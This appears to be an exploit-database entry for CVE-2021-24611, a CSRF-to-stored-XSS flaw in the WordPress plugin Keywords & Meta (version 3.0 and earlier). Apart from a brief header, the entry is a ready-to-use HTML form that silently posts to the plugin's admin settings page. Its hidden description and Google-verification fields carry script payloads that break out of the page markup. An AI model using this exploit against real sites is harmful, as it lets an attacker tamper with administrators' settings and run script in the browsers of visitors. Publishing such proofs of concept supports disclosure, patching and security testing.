Exploit for Keywords & Meta <= 3.0 - CSRF to Stored Cross-Site Scripting (XSS) CVE-2021-24611

Name: Exploit for Keywords & Meta <= 3.0 - CSRF to Stored Cross-Site Scripting (XSS) CVE-2021-24611
Rating: 5 (363 reviews)

2021-08-09 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:B4A2E595-6971-4A2A-A346-AC4445A5E0CD
<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=keyword-meta%2Fkeyword-meta.php" method="POST">
      <input type="hidden" name="keywords_add" value="0" />
      <input type="hidden" name="keywords_edit" value="" />
      <input type="hidden" name="description_edit" value="</textarea><script>alert(/XSS-Desc/)</script>" />
      <input type="hidden" name="og_enable" value="0" />
      <input type="hidden" name="og_type_edit" value="0" />
      <input type="hidden" name="og_title_all" value="0" />
      <input type="hidden" name="og_url_edit" value="0" />
      <input type="hidden" name="og_image_edit" value="0" />
      <input type="hidden" name="og_image_all" value="0" />
      <input type="hidden" name="apple_icon_edit" value="0" />
      <input type="hidden" name="android_icon_edit" value="0" />
      <input type="hidden" name="mobile_restrict_viewport" value="0" />
      <input type="hidden" name="google_verify_edit" value='"><script>alert(/XSS-Goole-Code)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>